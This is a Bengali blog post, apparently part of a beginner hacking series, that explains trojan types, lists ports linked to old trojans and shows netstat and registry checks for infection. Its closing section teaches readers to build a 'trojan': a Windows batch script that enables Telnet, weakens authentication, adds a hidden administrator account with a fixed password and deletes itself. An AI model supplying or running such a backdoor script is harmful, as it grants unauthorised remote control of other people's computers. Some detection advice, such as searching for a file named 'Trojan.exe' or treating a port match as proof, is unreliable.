কেমন আছেন সবাই ? আশা করি ভালো আছেন :D অনেকদিন পর লিখতে বসলাম । হুট করে কিছু ব্যাক্তিগত ব্যস্ততার কারনে এ কদিন সময় দিতে পারি নাই । যাইহোক আবার চলে এসেছি । ইনশাআল্লাহ এখন থেকে আবার নিয়মিত লিখতে পারব :) আজ আমি লিখব ব্যাসিক হ্যাকিং এর ৩য় পর্ব । আজ আপনাদের কে ট্রোজান সম্পর্কে নুন্যতম প্রয়োজনীয় তথ্য গুলো জানাতে চেষ্টা করব :)
শুরুতেই আসুন জেনে নেই ট্রোজান কি ?
ট্রোজান সম্পর্কে উইকিপিডিয়া বলে
A Trojan horse, or Trojan, is a standalone malicious program that does not attempt to infect other computers in a completely automatic manner without help from outside forces like other programs and human intervention.
অর্থাৎ স্ব নির্ভর যে সব ক্ষতিকারক প্রোগ্রাম বাইরের কোন সাহায্য ছাড়া যেমন অন্যান্য প্রোগ্রাম এবং মানুষের হস্তক্ষেপ ছাড়া স্বয়ংক্রিয় ভাবে অন্য কম্পিউটার বা সিস্টেম কে আক্রান্ত করার চেষ্টা করে না তাদের কে ট্রোজান বা ট্রোজান হর্স বলে ।
সহজ ভাষা তে একটি বাস্তব ও বিশ্বাসযোগ্য [ trusted ] প্রোগ্রাম এর ভেতর লুকিয়ে থাকা অনাকাঙ্ক্ষিত ও ক্ষতিকারক প্রোগ্রাম ট্রোজান । যেহেতু এটা অনাকাঙ্ক্ষিত , তাই এর গতিবিধি , কার্যপ্রণালী , কার্যপদ্ধতি , ব্যাপ্তি সবকিছুই ইউজার এর নিকট অজানা থেকে যায় । কথা প্রসঙ্গে বলে রাখি অপারেটিং সিস্টেম এর registry অন্তর্ভুক্ত না থাকা সব প্রোগ্রাম ই অনাকাঙ্ক্ষিত বলে সিস্টেম এর কাছে গণ্য হবে ।
ট্রোজান এর কার্যবিধি :
গ্রীক মিথ অনুযায়ী গ্রীক রা তাদের সৈন্য বাহিনী কে কতগুলো কাঠের তৈরি ঘোড়ার ভেতর ভরে সেই ঘোড়াগুলোকে ট্রয় বাসীদের উপহার দেয়। পরে যুদ্ধ শুরু হলে ওই সৈন্য গুলো ঘোড়া থেকে বের হয়ে ট্রয় এর অভেদ্য দেয়াল এর ভেতর থেকে আক্রমন করে ট্রয় দখল করে নেয় । অখান থেকেই মুলত এধরনের প্রোগ্রাম কে ট্রোজান নাম দেওা হয় । একে হ্যাকার রা ভালবেসে Mr. James ও বলে থাকে এর গুপ্তচর বৃত্তীয় কাজে দক্ষতার জন্য !
ট্রোজান এর সৃষ্টিকর্তা বা ডিজাইনার এর ইচ্ছা অনুযায়ী ট্রোজান করতে পারে না এমন কোন কাজ নেই ! ! এটা ফাইল কপি , ডিলিট , পেস্ট , adware , malware , spyware প্রোগ্রাম ইন্সটল করা , ইন্টারনেট অ্যাক্সেস , প্রোগ্রাম রিমুভ সব ই করতে পারে ।
ট্রোজান এর ধরণ :
☻Remote Access Trojans: এগুলো ভিকটিম এর সিস্টেম এর আংশিক বা পুরপুরি দখল নিয়ে নিতে পারে । একটা সার্ভার অ্যাপ্লিকেশান এর মাধ্যমে ভিকটিম এর পিসি হতে সব ধরনের আনুচরন করা হয় হ্যাকার এর পিসি থেকে । সিস্টেম স্টার্ট করার সাথে সাথে এটা এর ক্লায়েন্ট সিস্টেম [ হ্যাকার এর সিস্টেম ] এর সাথে একটা নির্দিষ্ট পোর্ট এর মাধ্যমে নিরাপদ সংযোগ স্থাপন করে । এর পর ক্লায়েন্ট সিস্টেম থেকে যা ইচ্ছা করা যায় ভিকটিম এর সিস্টেম এ । বেশীর ভাগ ট্রোজান এ ধরনের।
☻Data Sending Trojans: একটা ইমেইল বা ব্যাকডোর এর মাধ্যমে ভিকটিম এর সিস্টেম হতে কী – লগ , পাসওয়ার্ড , কুকি ক্লায়েন্ট সিস্টেম এ ফিড করে ।
☻Destructive Trojans : দুটো উদ্দেশ্য এ ধরনের ট্রোজান ব্যবহার করা হয়ে থাকে । (এক) ধ্বংসাত্মক উদ্দেশ্য – সিস্টেম ক্র্যাশ , অপারেটিং সিস্টেম কে করাপ্ট করা বা উরাধুরা র্যানডম ফাইল ডিলিট করা । ( দুই ) সিরিয়াস উদ্দেশ্য – আপনার পিসি আর হ্যাকার এর ভেতর সব থেকে বড় বাধা হচ্ছে আপনার সিস্টেম এর ফায়ারওয়াল বা অ্যান্টিভাইরাস । আপনার পিসি কে নিজের বাগান এর মত বানিয়ে নিতে হ্যাকার রা এ ধরনের ট্রোজান বানায় । এটা এমন ভাবে প্রোগ্রাম করা হয় যে এ আপনার সিস্টেম এ এশে বসতি গাড়বে আপনারই সাধের ফায়ার ওয়াল বা অ্যান্টিভাইরাস এর উপর এগুলোর সিক্যুরিটি কে আংশিক বা পুরপুরি ডিসঅ্যাবেল করে । হয়ত আপনার কাছে সবকিছুই আপাত ও ঠিকঠাক লাগবে কিন্তু কিছুই ঠিক নেই :(
☻DDos Attack Trojans: একটা সার্ভার এর সাথে সংযুক্ত সন গুলো সিস্টেম [ ল্যান নেটওয়ার্ক ] বা সিস্টেম কে ধসিয়ে দেবার জন্য এর কোন তুলনা ও নেই , উত্তর ও নেই , প্রতিরধ ও নেই । এরা অপরাজেয় ! এটা প্রথমে সার্ভার এর ও এর সাথে সংযুক্ত সবগুলো সিস্টেম গুলো কে আক্রমন করে আক্রান্ত বা ইনফ্যাক্টেড করে ফেলে এবং এগুলো কে স্ট্যান্ডবাই করে রাখে । এর পর হঠাৎ করে সবগুলো সিস্টেম এ এবং সিস্টেম গুলো থেকে সার্ভার এ একসাথে অগুনতি সিস্টেম কমান্ড দিতে থাকে । সিস্টেম এর কার্যকরী ক্ষমতার বাইরে যখনই কমান্ড এর সংখ্যা চলে যাবে তখন এ সার্ভার ও এর সাথে সংযুক্ত সবগুলো সিস্টেম একসাথে ক্র্যাশ করবে এবং অকারজকরি হয়ে যাবে ।
☻Proxy Trojans : হ্যাকার দের পরিচয় গোপন করাই এটার উদ্দেশ্য। মনে করুন আপনার সিস্টেম কে আমি আক্রমন করব । সে জন্য আপনার পিসি এর পরিচয় আমাকে পেতে হবে । আমি আমার কম্যান্ড প্রম্পট থেকে সহজেই টা পেতে পারি । কিন্তু সে জন্য আমাকে আমার নিজের পরিচয় ও দিতে হবে । এখানে পরিচ্য শব্দ টা ব্যাবহার করা হচ্ছে পোর্ট আইডেনটিটি , আই পি , ম্যাক সব এ অন্তর্ভুক্ত । শুধু এটা লুকানর জন্যই এধরেন ট্রোজান ব্যাবহার করা হয় । এটা দ্বারা আমি অন্য একটা স্লেভ সিস্টেম ব্যাবহার করে আপনার পরিচয় নিতে পারব এবং সেক্ষেত্রে আপনি ব্যাক ট্র্যাক করলেও স্লেভ সিস্টেম এর পরিচয় পাবেন , আমার টা না !
☻Security Software Disabler Trojan : এটার নামেই পরিচয় । সিস্টেম কে আক্রমন করে এদের কাজ হচ্ছে সিস্টেম এর ডিফল্ট না এমন সব সিক্যুরিটি অ্যাপ্লিকেশান এবং সফটওয়্যার গুলো কে ডিজঅ্যাবেল করে পরবর্তী আক্রমনের জন্য আদর্শ পরিবেশ তৈরি করে দেওয়া । এদের কে রেকি ট্রোজান ও বলে থাকে ।
কিভাবে বুঝবেন আপনি আক্রান্ত কিনা [ সনাক্তিকরন ]
ট্রোজান এর সবথেকে বড় সনাক্তিকরন পদ্ধতি হচ্ছে এটা যে কোন অবস্থা তেই নেটওয়ার্ক অ্যাডাপটার এর সাথে একটা নির্দিষ্ট পোর্ট এর মাধ্যমে লিসেনার পোস্ট বা হ্যাকার এর সিস্টেম এ ডাটা ফিড করে । হালনাগাদ অ্যান্টিভাইরাস অথবা অ্যান্টি স্পাই ও্যায়ার ,অ্যান্টি ম্যাল ও্যায়ার এগুলো থাকলে খুব সহজেই আপনি জানতে পারবেন আপনি ট্রোজান আক্রান্ত কিনা । শুধু তাই না আপনি সেগুল রিমুভ ও করতে পারবেন । তবে এগুলো ছাড়া ও আপনি বুঝতে পারবেন আপনি আক্রান্ত কিনা । তবে ব্যক্তিগত ভাবে আমি বলব আপনারা নিজে নিজেই ট্রোজান টি খুজে বের করার চেষ্টা করুন । কারন অনেক সময় ই ট্রোজান গুলো FUD / Fully Un-Detectable হয় । অর্থাৎ খুব হালনাগাদ অ্যান্টিভাইরাস ও এর অস্তিত্ব সম্পর্কে কিছুই বলতে পারে না ! নিজে কিভাবে খুজে বের করবেন তার পদ্ধতি আমি আপনাদের কে এখন বলব :)
১) প্রথমেই RUN থেকে কমান্ড প্রম্পট বা CMD ওপেন করুন নিচের চিত্রের মত করে
২) কমান্ড প্রম্পট ওপেন হলে netstat -a লিখে এন্টার দিন ।এতে করে আপনার সিস্টেম এর সচল সবগুলো পোর্ট কানেকশন , লোকাল , ফরেন অ্যাড্রেস ও এর অবস্থা সম্পর্কিত একটা তালিকা প্রদর্শন করবে CMD ।
৩) একটু অপেক্ষা করুন ।এবার netstat -a লিখে কমান্ড দিন এমং এন্টার চাপুন এবার আপনার সিস্টেম এর সবগুলো পোর্ট কে প্রদর্শন করাবে CMD নিচের চিত্রের মত করে
৪) Local Address এর নিচে যত গুলো এন্ট্রি দেখতে পাবেন তার সবগুলোর শেষে ‘:’ এই চিহ্নের পর যে সংখ্যা থাকবে ওটাই হচ্ছে ওই কানেকশন এর লোকাল পোর্ট । চিত্রের নিচে লক্ষ্য করুন একটা লিস্ট দেওয়া আছে । যেখানে পরিচিত সব ট্রোজান গুলো কোন কোন পোর্ট ব্যবহার করে তার পূর্ণ তালিকা করা হয়েছে । ওখান থেকে আপনার CMD থেকে প্রাপ্ত লিস্ট এর সাথে মিলিয়ে দেখুন । যদি দেখেন কোন পোর্ট মিলে গেছে তাহলে নিচের চিত্রের মত করে আবার কমান্ড প্রম্পট এ লিখুন netstat -aon এবং এন্টার চাপুন
| পোর্ট | ট্রোজান এর নাম |
|---|---|
| 1 (UDP) | Sockets des Troie |
| 2 | Death |
| 20 | Senna Spy FTP server |
| 21 | Back Construction, Blade Runner, Cattivik FTP Server, CC Invader, Dark FTP, Doly Trojan, Fore, Invisible FTP, Juggernaut 42, Larva, MotIv FTP, Net Administrator, Ramen, Senna Spy FTP server, The Flu, Traitor 21, WebEx, WinCrash |
| 22 | Shaft |
| 23 | Fire HacKer, Tiny Telnet Server – TTS, Truva Atl |
| 25 | Ajan, Antigen, Barok, Email Password Sender – EPS, EPS II, Gip, Gris, Happy99, Hpteam mail, Hybris, I love you, Kuang2, Magic Horse, MBT (Mail Bombing Trojan), Moscow Email trojan, Naebi, NewApt worm, ProMail trojan, Shtirlitz, Stealth, Tapiras, Terminator, WinPC, WinSpy |
| 30 | Agent 40421 |
| 31 | Agent 31, Hackers Paradise, Masters Paradise |
| 41 | Deep Throat, Foreplay |
| 48 | DRAT |
| 50 | DRAT |
| 58 | DMSetup |
| 59 | DMSetup |
| 79 | CDK, Firehotcker |
| 80 | 711 trojan (Seven Eleven), AckCmd, Back End, Back Orifice 2000 Plug-Ins, Cafeini, CGI Backdoor, Executor, God Message, God Message Creator, Hooker, IISworm, MTX, NCX, Reverse WWW Tunnel Backdoor, RingZero, Seeker, WAN Remote, Web Server CT, WebDownloader |
| 81 | RemoConChubo |
| 99 | Hidden Port, NCX |
| 110 | ProMail trojan |
| 113 | Invisible Identd Deamon, Kazimas |
| 119 | Happy99 |
| 121 | Attack Bot, God Message, JammerKillah |
| 123 | Net Controller |
| 133 | Farnaz |
| 137 | Chode |
| 137 (UDP) | Msinit |
| 138 | Chode |
| 139 | Chode, God Message worm, Msinit, Netlog, Network, Qaz |
| 142 | NetTaxi |
| 146 | Infector |
| 146 (UDP) | Infector |
| 170 | A-trojan |
| 334 | Backage |
| 411 | Backage |
| 420 | Breach, Incognito |
| 451 | TCP Wrappers trojan |
| 455 | Fatal Connections |
| 456 | Hackers Paradise |
| 513 | Hackers Paradise |
| 555 | RPC Backdoor |
| 605 | Net666, Rasmin |
| 666 | 711 trojan (Seven Eleven), Ini-Killer, Net Administrator, Phase Zero, Phase-0, Stealth Spy |
| 667 | Secret Service |
| 669 | Attack FTP, Back Construction, BLA trojan, Cain & Abel, NokNok, Satans Back Door – SBD, ServU, Shadow Phyre, th3r1pp3rz (= Therippers) |
| 692 | SniperNet |
| 777 | DP trojan |
| 808 | GayOL |
| 911 | AimSpy, Undetected |
| 999 | WinHole |
| 1000 | Dark Shadow |
| 1001 | Deep Throat, Foreplay, WinSatan |
| 1010 | Der Späher / Der Spaeher, Direct Connection |
| 1011 | Der Späher / Der Spaeher, Le Guardien, Silencer, WebEx |
| 1012 | Doly Trojan |
| 1015 | Doly Trojan |
| 1016 | Doly Trojan |
| 1020 | Doly Trojan |
| 1024 | Doly Trojan |
| 1025 | Vampire |
| 1025 (UDP) | Jade, Latinus, NetSpy |
| 1035 | Remote Storm |
| 1042 | Remote Storm |
| 1045 | Multidropper |
| 1049 | BLA trojan |
| 1050 | Rasmin |
| 1053 | /sbin/initd |
| 1054 | MiniCommand |
| 1080 | The Thief |
| 1081 | AckCmd |
| 1082 | WinHole |
| 1083 | WinHole |
| 1090 | WinHole |
| 1095 | WinHole |
| 1097 | Xtreme |
| 1098 | Remote Administration Tool – RAT |
| 1099 | Remote Administration Tool – RAT |
| 1150 | Remote Administration Tool – RAT |
| 1151 | Blood Fest Evolution, Remote Administration Tool – RAT |
| 1170 | Orion |
| 1200 (UDP) | Orion |
| 1201 (UDP) | Psyber Stream Server – PSS, Streaming Audio Server, Voice |
| 1207 | NoBackO |
| 1208 | NoBackO |
| 1212 | SoftWAR |
| 1234 | Infector |
| 1243 | Kaos |
| 1245 | SubSeven Java client, Ultors Trojan |
| 1255 | BackDoor-G, SubSeven, SubSeven Apocalypse, Tiles |
| 1256 | VooDoo Doll |
| 1269 | Scarab |
| 1272 | Project nEXT |
| 1313 | Matrix |
| 1338 | The Matrix |
| 1349 | The Matrix |
| 1394 | Millenium Worm |
| 1441 | Bo dll |
| 1492 | GoFriller, Backdoor G-1 |
| 1524 | Remote Storm |
| 1568 | FTP99CMP |
| 1600 | Trinoo |
| 1703 | Remote Hack |
| 1777 | Direct Connection, Shivka-Burka |
| 1807 | Exploiter |
| 1966 | Scarab |
| 1967 | SpySender |
| 1969 | Fake FTP |
| 1981 | WM FTP Server |
| 1999 | OpC BO |
| 2000 | টBowl,Shockrave |
| 2001 | Back Door, SubSeven, TransScout |
| 2023 | Der Späher / Der Spaeher, Insane Network, Last 2000, Remote Explorer 2000, Senna Spy Trojan Generator |
| 2080 | Der Späher / Der Spaeher, Trojan Cow |
| 2115 | Ripper Pro |
| 2130(UDP) | WinHole |
| 2140 | Bugs |
| 2140(UDP) | Mini Backlash |
| 2155 | The Invasor |
| 2255 | Deep Throat,Foreplay |
| 2283 | Illusion Mailer |
| 2300 | Nirvana |
| 2311 | Hvl RAT |
| 2330 | Xplorer |
| 2331 | Studio 54 |
| 2332 | Contact |
| 2333 | Contact |
| 2334 | Contact |
| 2335 | Contact |
| 2336 | Contact |
| 2337 | Contact |
| 2338 | Contact |
| 2339 | Contact, Voice Spy |
| 2339(UDP) | Contact |
| 2345 | Contact, Voice Spy |
| 2565 | Voice Spy |
| 2583 | Doly Trojan |
| 2600 | Striker trojan |
| 2716 | WinCrash |
| 2773 | Digital RootBeer |
| 2774 | The Prayer |
| 2801 | SubSeven, SubSeven 2.1 Gold |
| 2989(UDP) | SubSeven, SubSeven 2.1 Gold |
| 3000 | Phineas Phucker |
| 3024 | Phineas Phucker |
| 3031 | Remote Shut |
| 3128 | WinCrash |
| 3129 | Microspy |
| 3150 | Reverse WWW Tunnel Backdoor, RingZero |
| 3150(UDP) | Masters Paradise |
| 3456 | The Invasor |
| 3459 | Deep Throat,Foreplay,Mini Backlash |
| 3700 | Terror trojan |
| 3777 | Eclipse 2000,Sanctuary |
| 3791 | Portal of Doom |
| 3801 | PsychWard |
| 4000 | Total Solar Eclypse |
| 4092 | Total Solar Eclypse |
| 4242 | SkyDance |
| 4321 | WinCrash |
| 4444 | Virtual Hacking Machine -VHM |
| 4567 | BoBo |
| 4590 | Prosiak, Swift Remote |
| 4950 | File Nail |
| 5000 | ICQ Trojan |
| 5001 | ICQ Trogen (Lm) |
| 5002 | Back Door Setup, Blazer5, Bubbel, ICKiller, Ra1d, Sockets des Troie |
| 5010 | Back Door Setup, Sockets des Troie |
| 5011 | cd00r, Shaft |
| 5025 | Solo |
| 5031 | One of the Last Trojans – OOTLT, One of the Last Trojans – OOTLT, modified |
| 5032 | WM Remote KeyLogger |
| 5321 | Net Metropolitan |
| 5333 | Net Metropolitan |
| 5343 | Firehotcker |
| 5400 | Backage, NetDemon |
| 5401 | wCrat – WC Remote Administration Tool |
| 5402 | Back Construction, Blade Runner |
| 5512 | Back Construction, Blade Runner |
| 5534 | Back Construction, Blade Runner |
| 5550 | Illusion Mailer |
| 5555 | Xtcp |
| 5556 | ServeMe |
| 5557 | BO Facil |
| 5569 | BO Facil |
| 5637 | Robo – Hack |
| 5638 | PC Crasher |
| 5742 | PC Crasher |
| 5760 | WinCrash |
| 5880 | Portmap Remote Root Linux Exploit |
| 5882 | Y3K RAT |
| 5882 | Y3K RAT |
| 5882 (UDP) | Y3K RAT |
| 5888 | Y3K RAT |
| 5889 | Y3K RAT |
| 5889 | Y3K RAT |
| 6000 | The Thing |
| 6000 | Bad Blood |
| 6000 | Secret Service |
| 6000 | The Thing |
| 6661 | TEMan, Weia-Meia |
| 6666 | Dark Connection Inside, NetBus worm |
| 6667 | Dark FTP, ScheduleAgent, SubSeven, Subseven 2.1.4 DefCon 8, Trinity, WinSatan |
| 6669 | Host Control, Vampire |
| 6670 | BackWeb Server, Deep Throat, Foreplay, WinNuke eXtreame |
| 6711 | BackDoor-G, SubSeven, VP Killer |
| 6710 | Funny trojan, SubSeven |
| 6713 | SubSeven |
| 6723 | Mstream |
| 6771 | Deep Throat, Foreplay |
| 6776 | 2000 Cracks, BackDoor-G, SubSeven, VP Killer |
| 6838 (UDP) | Mstream |
| 6883 | Delta Source DarkStar (??) |
| 6912 | Shit Heep |
| 6939 | Indoctrination |
| 6969 | GateCrasher, IRC 3, Net Controller, Priority |
| 6970 | GateCrasher |
| 7000 | Exploit Translation Server, Kazimas, Remote Grab, SubSeven, SubSeven 2.1 Gold |
| 7001 | Freak88, Freak2k |
| 7215 | SubSeven, SubSeven 2.1 Gold |
| 7300 | NetMonitor |
| 7301 | NetMonitor |
| 7306 | NetMonitor |
| 7307 | NetMonitor |
| 7308 | NetMonitor |
| 7424 | Host Control |
| 7424 (UDP) | Host Control |
| 7597 | Qaz |
| 7626 | Glacier |
| 7777 | God Message, Tini |
| 7789 | Back Door Setup, ICKiller |
| 7891 | The ReVeNgEr |
| 7983 | Mstream |
| 8080 | Brown Orifice, RemoConChubo, Reverse WWW Tunnel Backdoor, RingZero |
| 8787 | Back Orifice 2000 |
| 8988 | BacHack |
| 8989 | Rcon, Recon, Xcon |
| 9000 | Netministrator |
| 9325 (UDP) | Mstream |
| 9400 | InCommand |
| 9872 | Portal of Doom |
| 9873 | Portal of Doom |
| 9874 | Portal of Doom |
| 9875 | Portal of Doom |
| 9876 | Cyber Attacker, Rux |
| 9878 | TransScout |
| 9989 | Ini-Killer |
| 9999 | The Prayer |
| 10000 | OpwinTRojan |
| 10005 | OpwinTRojan |
| 10067 (UDP) | OpwinTRojan |
| 10085 | Syphillis |
| 10086 | Syphillis |
| 10100 | Control Total, Gift trojan |
| 10101 | BrainSpy, Silencer |
| 10167 (UDP) | Portal of Doom |
| 10520 | Acid Shivers |
| 10528 | Host Control |
| 10607 | Coma |
| 10666 (UDP) | Ambush |
| 11000 | Senna Spy Trojan Generator |
| 11050 | Host Control |
| 11051 | Host Control |
| 11223 | Progenic trojan, Secret Agent |
| 12076 | Gjamer |
| 12345 | Hack´99 KeyLogger |
| 12346 | Ashley, cron / crontab, Fat Bitch trojan, GabanBus, icmp_client.c, icmp_pipe.c, Mypic, NetBus, NetBus Toy, NetBus worm, Pie Bill Gates, Whack Job, X-bill |
| 12349 | Fat Bitch trojan, GabanBus, NetBus, X-bill |
| 12361 | BioNet |
| 12362 | Whack-a-mole |
| 12363 | Whack-a-mole |
| 12623 (UDP) | Whack-a-mole |
| 12624 | DUN Control |
| 12631 | ButtMan |
| 12754 | Whack Job |
| 13000 | Mstream |
| 13010 | Senna Spy Trojan Generator, Senna Spy Trojan Generator |
| 13013 | Hacker Brasil – HBR |
| 13014 | PsychWard |
| 13223 | PsychWard |
| 13473 | Hack´99 KeyLogger |
| 14500 | Chupacabra |
| 14501 | PC Invader |
| 14502 | PC Invader |
| 14503 | PC Invader |
| 15000 | PC Invader |
| 15092 | NetDemon |
| 15104 | Host Control |
| 15382 | Mstream |
| 15858 | SubZero |
| 16484 | CDK |
| 16660 | Mosucker |
| 16772 | Sracheldraht |
| 16959 | ICQ Revenge |
| 16969 | SubSeven, Subseven 2.1.4 DefCon 8 |
| 17166 | Priority |
| 17300 | Mosaic |
| 17449 | Kuang2 the virus |
| 17500 | Kid Terror |
| 17569 | CrazzyNet |
| 17593 | CrazzyNet |
| 17777 | Infector |
| 18753 (UDP) | Audiodoor |
| 19864 | Nephron |
| 20000 | ICQ Revenge |
| 20001 | Millenium |
| 20002 | Millenium, Millenium (Lm) |
| 20005 | AcidkoR |
| 20023 | Mosucker |
| 20034 | NetBus 2.0 Pro, NetBus 2.0 Pro Hidden, NetRex, Whack Job |
| 20203 | Chupacabra |
| 20331 | BLA trojan |
| 20432 | Shaft |
| 20433 (UDP) | Shaft |
| 21544 | GirlFriend, Kid Terror |
| 21554 | Exploiter, Kid Terror, Schwindler, Winsp00fer |
| 22222 | Donald Dick, Prosiak, Ruler, RUX The TIc.K |
| 23005 | NetTrash |
| 23006 | NetTrash |
| 23023 | Logged |
| 23030 | Amanda |
| 23432 | Asylum |
| 23456 | Evil FTP, Ugly FTP, Whack Job |
| 23476 | Donald Dick |
| 23476 (UDP) | Donald Dick |
| 23477 | Donald Dick |
| 23777 | InetSpy |
| 24000 | Infector |
| 25685 | Moonpie |
| 25686 | Moonpie |
| 25982 | Moonpie |
| 26274 (UDP) | Delta Source |
| 26681 | Voice Spy |
| 27374 | Bad Blood, Ramen, Seeker, SubSeven, SubSeven 2.1 Gold, Subseven 2.1.4 DefCon 8, SubSeven Muie, Ttfloader |
| 27444 (UDP) | Trinoo |
| 27573 | SubSeven |
| 27665 | Trinoo |
| 28678 | Exploiter |
| 29104 | NetTrojan |
| 29363 | ovasOn |
| 29891 | The Unexplained |
| 30000 | Infector |
| 30001 | ErrOr32 |
| 30003 | Lamers Death |
| 30029 | AOL trojan |
| 30100 | NetSphere |
| 30101 | NetSphere |
| 30102 | NetSphere |
| 30103 | NetSphere |
| 30103 (UDP) | NetSphere |
| 30133 | NetSphere |
| 30303 | Sockets des Troie |
| 30947 | Intruse |
| 30999 | Trinoo |
| 31335 | Bo Whack, Butt Funnel |
| 31336 | Back Fire, Back Orifice 1.20 patches, Back Orifice (Lm), Back Orifice russian, Baron Night, Beeone, BO client, BO Facil, BO spy, BO2, cron / crontab, Freak88, Freak2k, icmp_pipe.c, Sockdmini |
| 31337 | Back Orifice, Deep BO |
| 31337 (UDP) | Back Orifice, Butt Funnel, NetSpy (DK) |
| 31338 | BOWhack |
| 31338 (UDP) | Hack´a´Tack |
| 31787 | Hack´a´Tack |
| 31788 | Hack´a´Tack |
| 31789 (UDP) | Hack´a´Tack |
| 31790 | Hack´a´Tack |
| 31791 (UDP) | Hack´a´Tack |
| 31792 | Hack´a´Tack |
| 32001 | Donald Dick |
| 32100 | Peanut Brittle, Project nEXT |
| 32418 | Acid Battery |
| 33270 | Trinity |
| 33333 | Blakharaz, Prosiak |
| 33577 | Son of PsychWard |
| 33777 | Son of PsychWard |
| 33911 | Spirit 2000, Spirit 2001 |
| 34324 | Big Gluck, TN |
| 34444 | Donald Dick |
| 34555 (UDP) | Trinoo (for Windows) |
| 35555 (UDP) | Trinoo (for Windows) |
| 37237 | Mantis |
| 37651 | Yet Another Trojan – YAT |
| 40412 | The Spy |
| 40421 | Agent 40421, Masters Paradise |
| 40422 | Masters Paradise |
| 40423 | Masters Paradise |
| 40425 | Masters Paradise |
| 40426 | Masters Paradise |
| 41337 | Storm |
| 41666 | Remote Boot Tool – RBT, Remote Boot Tool – RBT |
| 44444 | Prosiak |
| 44575 | Exploiter |
| 47262 (UDP) | Delta Source |
| 49301 | OnLine KeyLogger |
| 50130 | Enterprise |
| 50505 | Sockes des Troie |
| 50766 | Fore, Schwindler |
| 51966 | Cafeini |
| 52317 | Acid Battery |
| 53001 | Remote Windows Shutdown – RWS |
| 54283 | SubSeven, SubSeven 2.1 Gold |
| 54320 | Back Orifice 2000 |
| 54321 | Back Orifice 2000, School Bus |
| 55165 | File Manager trojan, File Manager trojan, WM Trojan Generator |
| 55166 | WM Trojan Generator |
| 57341 | NetRaider |
| 58339 | Butt Funnel |
| 60000 | Deep Throat, Foreplay, Sockets des Troie |
| 60001 | Trinity |
| 60068 | Xzip 6000068 |
| 60411 | Connection |
| 61348 | Bunker – Hill |
| 61466 | TeleCommando |
| 61603 | Bunker – Hill |
| 63485 | Bunker – Hill |
| 64101 | Taskman |
| 65000 | Devil, Sockets des Troie, Stacheldraht |
| 65390 | Eclypse |
| 65421 | Jade |
| 65432 | The Traitor (= th3tr41t0r) |
| 65432 (UDP) | The Traitor (= th3tr41t0r) |
| 65534 | /sbin/initd |
| 65535 | RC1 trojan |
৪) এবার উপরের প্রথম ছবি তে লক্ষ্য করুন একেবারে ডান পাশে PID আছে । এটা হচ্ছে Process ID । যে পোর্ট টা মিলে গেছে সেটার পোর্ট নাম্বার এর PID খুজে বের করুন । এবার Windows Task Manager বের করুন এবং Services ট্যাব টি তে ক্লিক করুন নিচের চিত্রের মত । মাঝের সারিতে দেওয়া PID এর সাথে মিলিয়ে দেখুন প্রসেস নাম ও এর বর্ণনা [ description ]। নাম টা উপরে দেওয়া তালিকার সাথে মিলে যায় যদি তাহলে নিশ্চিত থাকুন আপনি ট্রোজান আক্রান্ত :(
উপরের পদ্ধতি ছাড়াও আপনি রেজিস্ট্রি এর মাধ্যমে বের করতে পারেন ট্রোজান আক্রান্ত কিনা আপনি । সব ট্রোজান ই auto – startup এর আদলে নির্মিত । অর্থাৎ উইন্ডোজ ওপেন হলে এরাও ওপেন হয়ে যায় । তাই আপনি রেজিস্ট্রি থেকে খুব সহজেই দেখতে পারেন কোন কোন প্রোগ্রাম গুলো স্টার্ট আপ এর সাথে রান করে । যদি রেজিস্ট্রি তে যেতে চান তাহলে কমান্ড প্রম্পট থেকে Regedit লিখে এন্টার চাপুন । আমি নিচে সবগুলো অটো রান এর ডিরেক্টরি দিয়ে দিচ্ছি । আপনি যদি এভাবে খুজে বের করতে চান ট্রোজান এর অস্তিত্ব, তাহলে প্রত্যেকটি ডিরেক্টরি তে যেয়ে দেখুন Trojan.exe বা trojan.exe নামের কোন প্রোগ্রাম আছে কিনা । থাকলে নিশ্ছিত থাকুন আপনি ট্রোজান আক্রান্ত ।
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce]
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices]
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce]
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce]
ট্রোজান থেকে বাঁচার উপায় :
১)ভালো মানের হালনাগাদ অ্যান্টিভাইরাস
২)অ্যান্টি স্পাইওয়্যার
৩)অ্যান্টি ফিশিং ওয়্যার
৪) রেজিট্রি ক্লিনার
৫) অ্যাড ব্লকার
৬) স্প্যাম রিমুভার
কিভাবে ট্রোজান বানাবেন ? :P :P :P
আমি খুব সহজ একটা ট্রোজান বানানো শিখিয়ে দিচ্ছি । এর জন্য দরকার শুধু এটা নোটপ্যাড ।
উইন্ডোজ এক্সপি এর জন্য ট্রোজান বানাতে হলে notepad ওপেন করুন এবং তাতে নিচের কোড টা কপি পেস্ট করুন এবং যেকোনো নাম দিয়ে .bat এক্সটেন্সান হিসেবে সেভ করুন ।
@echo off
sc config tlntsvr start=auto
sc start tlntsvr
tlntadmn config sec=-NTLM
tlntadmn config mode=stream
net user tunerpage/add
net user tunerpage 12345
net localgroup administrators tunerpage /add
reg /add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList /v tunerpage /t REG_DWORD /d 00
del trojan.bat
এখানে খেয়াল করুন উপরের কোড এ
১ম লাইন টা কমান্ড থেকে ইকো বন্ধ করে দিবে।
২য় লাইন টা প্রতিবার স্টার্টআপ এর সাথে সাথে সিস্টেম কে বলবে Telnet server কে স্টার্ট করতে।
৩য় লাইন টা সিস্টেম কে current windows NT systems এর জন্য Telnet server কে স্টার্ট করতে বলবে ।
৪র্থ লাইন টা পাসওয়ার্ড ফাইল এর NTLM hash security কে বন্ধ করে দিবে ।
৫ম লাইন টা Telnet server এর জন্য stream mode চালু করবে ও সংযোগ স্থাপন করবে ।
৬ষ্ঠ ও ৭ম লাইন দুটো tunerpage নামের একজন ইউজার তৈরি করবে যার পাসওয়ার্ড 12345 ।
৮ম লাইন টি tunerpage নামের ইউজারটিকে Administrator বানিয়ে দিবে ।
৯ম লাইন টি tunerpage নামের একজন ইউজার এর সব ডাটা লুকিয়ে রাখবে ।
১০ম লাইন টি পুরো ব্যাট ফাইল টিকে মুছে ফেলবে ।
